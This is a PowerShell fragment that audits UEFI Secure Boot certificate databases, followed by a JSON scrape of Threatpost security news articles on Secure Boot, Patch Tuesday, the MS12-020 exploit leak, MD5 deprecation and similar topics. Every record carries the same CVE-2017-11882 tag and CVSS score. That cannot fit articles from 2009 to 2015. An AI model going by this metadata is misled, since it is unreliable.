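            $owner = ConvertTo-Guid $bytes[$pos..($pos + 15)]
            $data  = [byte[]]$bytes[($pos + 16)..($pos + $sigSize - 1)]
            $entry = [ordered]@{ Variable = $Name; Owner = $owner; Subject = $null; NotAfter = $null }
            if ($type -eq $EfiCertX509Guid) {
                # A boot loader's Authenticode signature must chain to one of these to be loaded.
                $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList (,$data)
                $entry.Subject  = $cert.Subject
                $entry.NotAfter = $cert.NotAfter
            } elseif ($type -eq $EfiCertSha256Guid) {
                # Bare image hash; in dbx this revokes one specific binary regardless of its signature.
                $entry.Subject = 'SHA-256 ' + [BitConverter]::ToString($data).Replace('-', '').ToLower()
            } else {
                $entry.Subject = "unhandled signature type $type ($($data.Length) bytes)"
            }
            [pscustomobject]$entry
            $pos += $sigSize
        }
        $offset += $listSize
    }
}

"Secure Boot: $(Get-SecureBootState)"
foreach ($var in 'PK', 'KEK', 'db') {
    Get-EfiSignatureEntries -Name $var | Format-Table Variable, Subject, NotAfter -AutoSize
}
```

Run it once on a freshly imaged machine and keep the output: a db that later gains a certificate nobody recognises, or a state that flips from Enabled to Disabled, is exactly the change an attacker needs before a bootkit of the kind the post describes can survive a reboot. The same function with -Name dbx lists the revoked images.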
Such malware variants have become more popular in recent years as attackers have looked for new methods of keeping their attack tools on infected machines for a long period of time. That kind of malware can be difficult to detect and remove, and so Microsoft is hoping that the secure boot sequence using UEFI will help prevent it and other malicious software from making its way onto the PC in the first place.\n\n\u201cIn most PCs today, the pre-operating system environment is vulnerable to attacks by redirecting the boot loader handoff to possible malicious loaders. These loaders would remain undetected to operating system security measures and antimalware software,\u201d Microsoft\u2019s [Tony Mangefeste](<https://blogs.msdn.com/b/b8/archive/2011/09/22/protecting-the-pre-os-environment-with-uefi.aspx>) wrote in a post explaining the architectural change.\n\nHowever, critics have raised concerns that the system also gives Microsoft the ability to prevent users from running third-party operating systems such as Linux on their PCs. Ross Anderson, a security researcher at the University of Cambridge, said in a blog post yesterday that the move by Microsoft could have serious consequences.\n\n\u201cThe extension of Microsoft\u2019s OS monopoly to hardware would be a disaster, with increased lock-in, decreased consumer choice and lack of space to innovate. It is clearly [unlawful](<http://en.wikipedia.org/wiki/Article_82>) and must not succeed,\u201d Anderson wrote.\n\nMangefeste said that the secure boot sequence is designed to prevent malware from loading and not to stop users from loading other software they want to run, including alternate operating systems.\n\n\u201cAt the end of the day, the customer is in control of their PC. Microsoft\u2019s philosophy is to provide customers with the best experience first, and allow them to make decisions themselves. We work with our OEM ecosystem to provide customers with this flexibility. 
The security that UEFI has to offer with secure boot means that most customers will have their systems protected against boot loader attacks. For the enthusiast who wants to run older operating systems, the option is there to allow you to make that decision,\u201d Mangefeste wrote.\n\n\u201cA demonstration of this control is found in the Samsung tablet with Windows 8 Developer Preview that was offered to //BUILD/ participants. In the screenshot below you will notice that we designed the firmware to allow the customer to disable secure boot. However, doing so comes at your own risk.\u201d\n", "cvss3": {}, "published": "2011-09-23T15:14:43", "type": "threatpost", "title": "Microsoft Defends Secure Boot in Windows 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:43", "id": "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "href": "https://threatpost.com/microsoft-defends-secure-boot-windows-8-092311/75683/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "If there\u2019s one key message coming through all of the noise at the RSA Conference this week it\u2019s the fact that there\u2019s a pressing need for more data. Data on attacks, data on vulnerabilities, data on data breaches, data on software security, data on everything having to do with security. The mini-movement that has sprung up around metrics and measurement in security has taken over a lot of the conversation at the conference, with some interesting results.\n\nSeveral different panels and talks have addressed the metrics problem from a variety of angles, with the consensus being that there simply isn\u2019t enough good data available in most parts of the industry. The last few years have seen a marked increase in the amount of data available on some topics, especially data breaches, but those are still the exceptions rather than the rule. 
In a panel Wednesday morning, four experts with disparate backgrounds said that a big part of the problem is that it\u2019s not clear what should be measured or how.\n\nEven Microsoft, which has been looking at this problem for several years, doesn\u2019t have a clear answer. Adam Shostack, a security program manager at Microsoft, said the company has good systems in place for measuring vulnerability counts and patch counts, but is still working on how to get the most out of those numbers.\n\n\u201cThe one thing we know is that our customer would like fewer updates and more secure software,\u201d he said during the panel discussion, which also included Gary McGraw of Cigital, Matt Blaze of the University of Pennsylvania and Elizabeth Nichols of PlexLogic. \u201cThat\u2019s the primary metric that we work off of.\u201d\n\nMcGraw, who has been working on measuring software security and internal software security programs for several years, said that even the organizations doing the best job with those programs have a tough time getting the most out of their measurement efforts. But the key thing is, at least they\u2019re doing the measurements. The vast majority of software makers and other companies that produce their own custom applications aren\u2019t even taking that step.\n\n\u201cA lot of people are selling highly flammable software. 
There\u2019s no one who isn\u2019t because people don\u2019t know how to build secure software,\u201d Blaze said.\n", "cvss3": {}, "published": "2009-04-22T19:52:40", "type": "threatpost", "title": "Experts call for better measurement of security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:21439BDD06D57894E0142A06D59463B5", "href": "https://threatpost.com/experts-call-better-measurement-security-042209/72562/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:33", "description": "Microsoft announced Thursday that it plans to release four bulletins next week as part of the year\u2019s first batch of [Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2014/01/09/advance-notification-service-for-the-january-2014-security-bulletin-release.aspx>), none of which are rated critical.\n\nDespite the relatively light load, the patches do address a [zero-day vulnerability in Windows XP and Windows Server 2003](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) made public in early November. Hackers were actively exploiting the [flaw in the ND Proxy driver that manages Microsoft\u2019s Telephony API](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) on XP via infected PDF attachments. 
Exploits work only in conjunction with an Adobe Reader vulnerability that has since been patched.\n\nIn addition to Microsoft patches, expect a fresh batch of Adobe patches as well as Oracle\u2019s quarterly Critical Patch Update, which is generally a massive patch rollout that now includes Java patches.\n\nThe Microsoft bulletins will address vulnerabilities in Windows, Office and Dynamics AX, all of which Microsoft has rated important, including the zero-day fix.\n\n\u201cIt\u2019s only rated important for a variety of reasons, including the fact that Microsoft will end support for XP in April,\u201d said Russ Ernst, a director of product management at Lumension. \u201cIf you\u2019re still using XP, this will be an important patch to deploy. And, hopefully you are working on your migration plan.\u201d\n\nAccording to a post on Microsoft\u2019s Security Response Center blog by Dustin Childs, MS14-002 will address the zero day; Childs had acknowledged back in December that Microsoft was working on a patch for the issue, a kernel-mode vulnerability that allows a local attacker to escalate privileges and run code in the kernel.\n\n\u201cWe have only seen this issue used in conjunction with a PDF exploit in targeted attacks, and not on its own,\u201d Childs said.\n\nMicrosoft has used the zero-day vulnerability as a prime opportunity to urge [Windows users to migrate off XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>). 
The company previously announced its plans to effectively end support for the operating system on April 8.\n\nThe first bulletin will address a remote code execution flaw in Microsoft\u2019s SharePoint Server and Microsoft Word; the second, MS14-002, is the zero-day fix described above; the third will fix an elevation of privilege in Windows 7 and Server 2008 R2; and the last will fix a denial of service (DoS) issue in Dynamics AX, Microsoft\u2019s enterprise resource planning software.\n\nAs usual, Microsoft will push updates for the software in question next Tuesday and post patch analysis and deployment guidance on its Security Response Center blog.\n", "cvss3": {}, "published": "2014-01-09T13:02:31", "type": "threatpost", "title": "Microsoft to Patch Zero Day in January 2014 Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-01-14T19:04:09", "id": "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "href": "https://threatpost.com/microsoft-expected-to-patch-xp-zero-day-on-patch-tuesday/103591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. 
The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Prevention) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "cvss3": {}, "published": "2009-11-24T14:39:50", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:04:18", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": "https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Redmond, Washington-based software giant Microsoft and Detroit-based GM subsidiary OnStar have backtracked on policies widely seen as egregious privacy violations following lawsuits and public outcry. Here\u2019s the news:\n\n**Windows Phone Update Requires User Consent For Tracking**\n\nMicrosoft released their \u201cMango\u201d update, which, according to a report by Tom Warren on [Winrumors](<http://www.winrumors.com/windows-phone-7-5-no-longer-accesses-location-data-without-authorization/>), updates the Windows Phone, addressing widespread accusations and [a related lawsuit](<https://threatpost.com/class-action-lawsuit-accuses-microsoft-illegal-geotagging-090211/>) that the company had been tracking device locations without reasonable consent.\n\nIn a location and privacy FAQ on the Microsoft website, the company staunchly claims that the location information stored within the Windows Phone 7 devices is intended to gather information about nearby Wi-Fi access points and provide users with location based services more efficiently and effectively; this information does not uniquely identify or track devices, they say.\n\nHowever, the company also says they discovered that some of that information had been periodically relayed back to Microsoft when users access the camera application and use its 
US-English voice command feature. (Whoops!) This relay of information, Microsoft claims, is an unintended behavior. The latest update resolves these and other issues. Now users will have to agree if they want the Camera application to tag photo locations. Voice Command will no longer request location information at all.\n\nFor more information, read the FAQ [here](<http://www.microsoft.com/windowsphone/en-us/howto/wp7/web/location-and-my-privacy.aspx>).\n\n**OnStar Won\u2019t Force Automated Location Tracking**\n\nOnStar found itself in a similar situation after it was discovered that the vehicle navigation and emergency notification service was to begin [monitoring the speed and location of vehicles](<https://threatpost.com/onstar-track-speed-location-cars-even-after-opting-out-092111/>) equipped with OnStar technology on December 1, even if those owners decided to opt out or cancel OnStar\u2019s services.\n\nA press release published yesterday on the OnStar website announced that the company is revising its proposed terms and conditions to make it clear that customer data will not be collected after a customer cancels their OnStar service.\n\n\u201cWe realize that our proposed amendments did not satisfy our subscribers,\u201d OnStar President Linda Marshall said in the statement. \u201cThis is why we are leaving the decision in our customers\u2019 hands. We listened, we responded and we hope to maintain the trust of our more than 6 million customers.\u201d\n\nThe appearance of GPS and other location tracking technologies in mobile phones, cars and other devices has [raised concerns among privacy and civil liberties advocates in the U.S. and elsewhere](<https://threatpost.com/location-based-services-raise-privacy-security-risks-082510/>). 
An analysis by the Wall Street Journal found that iPhones running version 4 of the company\u2019s iOS operating system appeared to [track a user\u2019s location and movement](<https://threatpost.com/report-iphones-track-movement-even-location-services-disabled-042511/>) regardless of whether the user enabled or disabled location tracking. Like Microsoft, Apple claimed that the phones weren\u2019t tracking specific users\u2019 movements, just using the company\u2019s huge user base to assemble an accurate list of active cell phone towers and WiFi hotspots. Software vendors, too, have been discovered to be collecting location data, often quite apart from the kind of service they are providing. In just one example, the mobile phone application for the Pandora music streaming service was [found to be harvesting user location data](<https://threatpost.com/pandora-mobile-app-transmits-gobs-personal-data-040611/>). \n\nSecurity experts have wondered, aloud, [how else the company might use the location and movement data that is collected](<https://threatpost.com/iphones-location-and-threats-your-assets-042711/>), including how it might be used by third party advertisers. \n", "cvss3": {}, "published": "2011-09-28T18:07:32", "type": "threatpost", "title": "Blowback: Microsoft, OnStar Pump the Brakes on Location Tracking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:07:09", "id": "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "href": "https://threatpost.com/blowback-microsoft-onstar-pump-breaks-implicit-gps-tracking-092811/75700/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:30", "description": "Microsoft has a big, ugly problem on its hands. 
The company is caught in the middle of what\u2019s rapidly become a major controversy centered on the leak of proof-of-concept [exploit code for the MS12-020 RDP vulnerability](<https://threatpost.com/ms12-020-rdp-exploit-found-researchers-say-code-may-have-leaked-security-vendor-031612/>). Many researchers, including the one who first discovered the bug and reported it to Microsoft through the Zero Day Initiative, believe that the software giant has a leak, either within its own walls in Redmond, or somewhere in its MAPP information-sharing program.\n\nThere are a number of possible explanations for the appearance of the exploit code on a Chinese download site. As odd as it may sound, the absolute best-case scenario for Microsoft is that the code was inadvertently leaked by one of the members of the MAPP (Microsoft Active Protections Program) community. If that\u2019s the case, then it simply means that one (or possibly more) of the MAPP partners was careless with the information Microsoft shared with them and the code somehow got into the wrong hands. That\u2019s not good, but it\u2019s not fatal.\n\nThe second possibility is that someone working at one of the [MAPP companies](<http://www.microsoft.com/security/msrc/collaboration/mapp.aspx>) deliberately posted the code. The MAPP program includes several dozen security and antimalware companies from around the world, and although those companies have signed NDAs and should restrict access to the MAPP info to a small group of people within their organizations, it\u2019s possible that there\u2019s a rogue employee somewhere along the line who could have done this. \n\nMoving up the scale of relative badness, a third scenario would be that someone at ZDI leaked the exploit code, either deliberately or accidentally. 
ZDI has been buying bugs from researchers and forwarding the data on to affected vendors for several years now, and there hasn\u2019t been any acknowledged incident linked to exploit code from the company or one of its affiliated researchers finding its way into the public domain. Once the company confirms that a bug is exploitable and has signatures ready for its customers, it then sends the data in encrypted form to the affected vendors and is pretty much out of the process from there on out. And, there\u2019s evidence that the code posted on the Chinese site was written well after ZDI sent the vulnerability information to Microsoft.\n\nAaron Portnoy of ZDI said that he is \u201c100% confident\u201d that the leak did not come from ZDI and that Microsoft has confirmed this, as well.\n\n\u201cIt was most definitely not ZDI that leaked anything,\u201d he said. \u201cWe PGP encrypt all the details and send it to the vendor and it\u2019s out of our hands at that point. We\u2019ve never had any reason to think that there\u2019s any leaks in our organization.\u201d\n\nA fourth potential scenario is that someone at the Microsoft Security Response Center somehow leaked the code. This is a fairly terrifying possibility. Consider the access that MSRC employees have. They see the incoming bug reports from researchers, work with researchers to confirm the vulnerabilities and help develop proof-of-concept exploits. If someone inside that process purposely handed over information about the RDP bug, it would be a disaster. The RDP vulnerability is a valuable one because of the huge number of affected machines and the fact that it can be exploited over the network, pre-authentication. Giving exploit code for that kind of flaw\u2013or any flaw, for that matter\u2013to outside parties would be about as bad as it gets.\n\nWhich leads to the last possibility: the MSRC is compromised. This is the doomsday scenario for Microsoft and its customers. 
The MSRC is a repository of a tremendous amount of valuable vulnerability data, and if that organization was somehow owned, the repercussions would be mind-boggling. It seems likely that if this was the case, there would have been other indications of the compromise at some point, possibly in the form of other exploits being leaked. And it also stands to reason that if someone had compromised the MSRC, he wouldn\u2019t advertise that fact by posting identifiable exploit code on a public site.\n\n[Luigi Auriemma](<http://aluigi.org/adv/ms12-020_leak.txt>), who discovered the RDP flaw, says that he believes that the leak came from somewhere in the MAPP chain of custody, given that the exploit code in question looks to have been written at the MSRC and that it contains a packet that he is certain is one he wrote explicitly for the purpose of testing the bug.\n\n\u201cThe executable PoC was compiled in November 2011 and contains some debugging strings like MSRC11678 which is a clear reference to the Microsoft Security Response Center. In short it seems written by Microsoft for the internal tests and was leaked probably during its distribution to their \u2018partners\u2019 (MAPP) for the creation of antivirus signatures and so on,\u201d he wrote in an analysis of the situation on his site. \u201cThe other possible scenario is about a Microsoft employee as direct or indirect source of the leak. The hacker intrusion looks the less probable scenario at the moment. 
The information retrieved by other people in the moment I\u2019m writing seems to confirm the MAPP hypothesis.\u201d\n\nMicrosoft [published a blog post](<http://blogs.technet.com/b/msrc/archive/2012/03/16/proof-of-concept-code-available-for-ms12-020.aspx>) late Friday afternoon on the code leak, but hasn\u2019t made security officials available to answer specific questions.\n\n\u201cThe details of the proof-of-concept code appear to match the vulnerability information shared with Microsoft Active Protections Program (MAPP) partners. Microsoft is actively investigating the disclosure of these details and will take the necessary actions to protect customers and ensure that confidential information we share is protected pursuant to our contracts and program requirements,\u201d wrote Yunsun Wee, director in the Trustworthy Computing Group. \n\n_Note: Kaspersky Lab is a member of the MAPP program, but Threatpost editors do not have access to the MAPP information._\n", "cvss3": {}, "published": "2012-03-16T19:12:33", "type": "threatpost", "title": "MS12-020 RDP Code Leak Mystery Deepens As Microsoft Remains Silent", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:36", "id": "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "href": "https://threatpost.com/ms12-020-rdp-code-leak-mystery-deepens-microsoft-remains-silent-031612/76339/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:36", "description": "Many industries tend to run in identifiable cycles. Financial services, the auto industry, entertainment\u2013they all have cycles. Because the security industry isn\u2019t nearly as old as any of these, it hasn\u2019t had much of a chance to establish such cycles. 
But one seems to be appearing now in the form of renewed criticism and distaste for offensive security research.\n\nThe most recent cycle has been building momentum for some time now, but the jumping off point may have come last month in a talk by Adobe security and privacy chief Brad Arkin. The gist of the talk was that defenders need to focus their energy on making exploitation and attacks more expensive for the bad guys. However that happens\u2013whether it\u2019s through the addition of exploit mitigation technologies, deploying sandboxes or any number of other techniques\u2013raising the cost of attacks should be the priority.\n\n\u201cI would say to the researchers here, work on defense. This is where you\u2019re going to make a difference,\u201d Arkin said. \u201cIf you come up with a new offensive technology, the bad guys will use it.\u201d\n\nThat\u2019s in contrast to the mentality that has prevailed among many software companies and security professionals, who often focus on finding and fixing as many security vulnerabilities as possible. The more bugs you fix, the fewer there are for the attackers to exploit, after all.\n\nThat\u2019s true, of course, but it ignores the fact that the number of total bugs is unknowable and constantly changing. And, it also ignores the fact that many attackers don\u2019t ever bother with zero days; there\u2019s no need. There are so many older vulnerabilities that are lying unpatched on millions and millions of machines out there that it\u2019s a waste of time and money for attackers to look for new ones to exploit. \n\u201cFinancially motivated attackers don\u2019t invest in original research. It\u2019s too expensive these days,\u201d Arkin said. \u201cIt\u2019s pen testers or it\u2019s nation states or the people funded by them. 
That research is done by professional bad guys who have financial horizons that far exceed those of financially motivated bad guys.\u201d\n\nAt last week\u2019s RSA Conference there were more murmurs about the relative value of offensive security research, too. The ongoing debate about the sale of bugs\u2013whether it\u2019s on the black market, the grey area of government sales or to legitimate entities such as the Zero Day Initiative\u2013includes some in the security community who are of the mind that selling vulnerabilities is an inherently shady activity. That discussion came up many times over the course of the week, with a predictable lack of agreement on the subject.\n\nThe problem, opponents of bug sales say, is that regardless of who you sell the bug to, you have no way of knowing against whom that vulnerability might ultimately be used. Some researchers say that\u2019s not their problem; they do the research and make the sale and what happens after that is up to the buyer and out of their hands.\n\nWith the [Pwn2Own contest at CanSecWest](<https://threatpost.com/revamped-pwn2own-offer-105k-prizes-cash-google-chrome-0-days-012312/>) scheduled for later this week, the conversation will likely not just continue, but amp up. Offense is at the fore at CanSecWest, not just during Pwn2Own, but during the conference talks, as well, and rare is the year that a major bug or exploitation technique isn\u2019t revealed there.\n\nThis is not the first time this carousel has spun round this way. Ten or fifteen years ago, as legitimate security research was making its way into the mainstream, many vendors had reactions bordering on anaphylactic shock when a researcher reported a bug to them or went public with it after a lack of response. 
Large software companies, including Microsoft and Oracle, would in some cases refuse to deal with researchers at all or slow the process down to such a point that it was impossible for the researchers to know whether the bug would ever be fixed.\n\nThat led to the brain-melting disclosure debate, which has never gone away, and it also led to the establishment of formal security response programs and organizations at many companies. Later, it helped spur the bug bounty programs run by companies such as Google, Mozilla and others, to reward security researchers who chose to report their findings to the vendors privately.\n\nSo, as often happens, what was old is now new again. But this time it has the added spice of cyberwar hysteria, with legions of highly trained foreign attackers using zero days stolen from some secret NSA database. Maybe that\u2019s happening. Who knows? But what\u2019s definitely happening is that researchers are selling bugs to a variety of people and organizations, some legitimate and others not. And as long as serious bugs can command six figures, that\u2019s never going to end and neither will offensive security research.\n", "cvss3": {}, "published": "2012-03-06T10:20:31", "type": "threatpost", "title": "An End to Offensive Security Research? Unlikely", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:42", "id": "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "href": "https://threatpost.com/end-offensive-security-research-unlikely-030612/76285/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:19", "description": "About a decade ago, many large software makers learned some very difficult lessons about software security and building security into their products from the start. Some are still learning. 
The FTC and a variety of security experts are hoping that today\u2019s crop of start-ups will not have to go through that same painful process.\n\nThe FTC is launching a new initiative aimed at start-ups, called [Start With Security](<https://www.ftc.gov/tips-advice/business-center/guidance/start-security-guide-business>), that\u2019s designed to help smaller companies build security into not just their products, but also into their cultures. One of the thrusts of that effort is encouraging companies to begin thinking about the security of their products from the very beginning of the design and development process. This is something that vendors such as Microsoft, Adobe, and many others have been doing for some time.\n\nBut that\u2019s not always because someone inside the company just thought it was a keen idea. In most cases, the changes the software makers made were in response to repeated public attacks on their products and pressure from customers for change. Microsoft is the perfect example. Following a series of major worms that exploited bugs in their products, the company did an about-face on security.\n\n[Window Snyder](<https://threatpost.com/how-i-got-here-window-snyder/114524/>), who was in the security group at Microsoft at the time, said during a panel at an [event](<https://www.ftc.gov/news-events/events-calendar/2015/09/start-security-san-francisco>) sponsored by the FTC in San Francisco Wednesday that the change was an incredibly difficult one for the company.\n\n\u201cThe real motivator for change at Microsoft was a tremendous amount of pain. You guys don\u2019t have to go that route,\u201d said Snyder, who is now the CSO at Fastly.\n\n\u201cThe cost to Microsoft to make those kinds of changes was tremendous. It was a huge challenge for them to try and turn the ship at that point. That was a huge cost and you don\u2019t want to do it at the end, you want to do it at the beginning. 
That\u2019s the time to think about security.\u201d\n\nNot only is the process simpler when you start thinking about security early, it\u2019s far less expensive, the panelists said.\n\n\u201cSecurity is much, much, much cheaper the earlier you do it,\u201d said Devdatta Akhawe, a security engineer at Dropbox. \u201cEither you can plan for security early on and be happy later, or keep fighting and have an expensive battle later on.\u201d\n\nThis is a message that software security experts and many others have been trying to convey to developers and design teams for a long time, with varying levels of success. Many large enterprises, not just commercial software vendors, have adopted secure coding and threat modeling practices and become involved in projects such as [BSIMM](<https://www.bsimm.com>), a software security maturity model.\n\nBut getting the security message across to non-security people can be a difficult process. Frank Kim, CISO of The SANS Institute, said making the risks and rewards real for people is an important aspect of the effort.\n\n\u201cYou have to focus on telling stories. You can\u2019t just go and say, There\u2019s a vulnerability in this line of code and you\u2019re a terrible person,\u201d Kim said. \u201cWe make it tangible and concrete by telling stories about what can happen to your application as a result of that vulnerability.\u201d\n\nThe seriousness of the security problem is not lost on officials at the top of the FTC, which is responsible for investigating and punishing companies that fail to live up to security and privacy standards.\n\n\u201cIn a world where everything is connected, insecure products and services can have severe consequences. 
It\u2019s never been more clear that we must secure the software supporting our digital lives,\u201d FTC Chairwoman Edith Ramirez said in her opening remarks at the event.\n", "cvss3": {}, "published": "2015-09-09T15:03:39", "type": "threatpost", "title": "FTC, Experts Push Startups to Think About Security From the Beginning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-09-09T19:03:39", "id": "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "href": "https://threatpost.com/ftc-experts-push-startups-to-think-about-security-from-the-beginning/114612/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:21", "description": "The clock is running on Windows administrators to sweep out MD5 implementations before a February 2014 patch from Microsoft slams the door shut on the broken, aged crypto algorithm.\n\nMicrosoft released a pair of advisories yesterday in addition to its regular [Patch Tuesday security updates](<http://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981>) alerting users to the fact it would in six months [restrict the use of digital certificates with MD5 hashes](<http://technet.microsoft.com/en-us/security/advisory/2862973>) issued under roots in the Microsoft root certificate program. Admins should use the leeway to find any systems or applications relying on MD5 and determine whether the patch will break anything and otherwise impact their environments.\n\nThe second advisory announced the optional availability of network level authentication (NLA) as an authentication method that can be used during [Remote Desktop Protocol sessions](<https://support.microsoft.com/kb/2861855>). 
[NLA adds a layer of security to RDP sessions](<http://technet.microsoft.com/en-us/library/cc732713.aspx>) by requiring that the user be authenticated to the host server before creation of a session.\n\n\u201cMicrosoft seems to be going after less secure encryption techniques, and that\u2019s a good thing for Microsoft to start eliminating them from the landscape, especially MD5,\u201d said Lamar Bailey, director of security research and development at Tripwire. \u201cI also like the way they are releasing them as optional right now. [The MD5 patch] will be pushed out live in February, so this gives customers a chance to determine if it\u2019s going to break anything.\u201d\n\nWhen the patch is pushed universally in February, [MD5 hashes will no longer be accepted](<http://support.microsoft.com/kb/2862973>) among Microsoft root certificates. The change applies only to certificates used for server authentication, code signing and time stamping, Microsoft said, adding that it would not block other uses of MD5, and that it would allow for signed binaries that were signed before March 2009.\n\nCustomers need to determine, in the meantime, which services are still using MD5 crypto and switch to a stronger algorithm such as the SHA2 family. Weaknesses in MD5 were identified as early as the mid-1990s and research demonstrating collisions was presented in 2004 and 2005. In 2008, practical collision attacks, including one where an attacker could spoof a trusted root certificate authority, were also demonstrated, leading CERT late in that year to release a [vulnerability note](<http://www.kb.cert.org/vuls/id/836068>) that sounded the death knell for MD5.\n\nYet, vulnerability scanners and penetration testers continue to find MD5 inside organizations today and flag it for weak cryptography. 
The problem is that in order for users to change crypto on their servers, they have to manually edit the registry, which can be a chore.\n\n\u201cI\u2019m all for changing it; it should be gone and we see it in customer sites all the time,\u201d Bailey said. \u201cBut we have to make it easier to change it. It\u2019s like if you get a recall notice from a car manufacturer that says \u2018If you have this spark plug, bring your car in for servicing.\u2019 I don\u2019t know what spark plugs my car is running. I have to dive under the cover to figure out if I have what they\u2019re saying is bad.\u201d\n\nExperts say most production servers and webservers hosting production websites are likely not running MD5; it\u2019s second-tier development servers, for example, that were spun up years ago and still store sensitive data that are the outlying issue here\u2014and a tempting target for a hacker. With MD5 broken for so long, enough attacks have been made public and enough advances have been made in processor speeds that cracking MD5 crypto isn\u2019t likely that much of a barrier for an attacker.\n\nRoss Barrett, senior manager of security engineering with Rapid7, said that attackers can use stolen certificates to redirect traffic or inject malware.\n\n\u201cIt\u2019s a bit of a heavy-handed attack to just steal credit cards, but if you have a national security program and you\u2019re sweeping for anyone you can get at, this might justify the cost and effort behind this type of attack,\u201d Barrett said. \u201cAny crypto [attack] relies on the complexity of generating the hash versus the difficulty of creating a collision. This can be facilitated as we get more powerful computers and the technology gets stronger to do so. 
Plus you have a black market industry building computers suited for doing lots of math, like cracking hashes and generating collisions.\u201d\n\nTripwire\u2019s Bailey, for example, estimates that 30 percent of the customers he deals with are still running MD5 somewhere in their environments.\n\n\u201cWe see it with a lot of homegrown systems and apps where the team that worked on it built it years ago and may not be there anymore. They built a custom app running MD5 crypto and said that was good enough because they were internal. Well it\u2019s not.\u201d\n\nThis isn\u2019t Microsoft\u2019s first move against weak cryptographic schemes. Last October, it released a mechanism organizations could use to find RSA certificate key lengths shorter than 1024. In June, anything shorter was considered untrusted and was revoked. Microsoft, in fact, urged customers to move to 2048-bit or higher keys.\n\n\u201cThe test will be for the end user that this is coming and it\u2019s time to get rid of it in the environment,\u201d Bailey said. \u201cAnd Microsoft is testing too whether any of its customers push back and need more time. If February rolls around and it\u2019s not a mandatory update, that\u2019s probably what happened. I don\u2019t remember Microsoft giving customers such a long runway on this kind of change. 
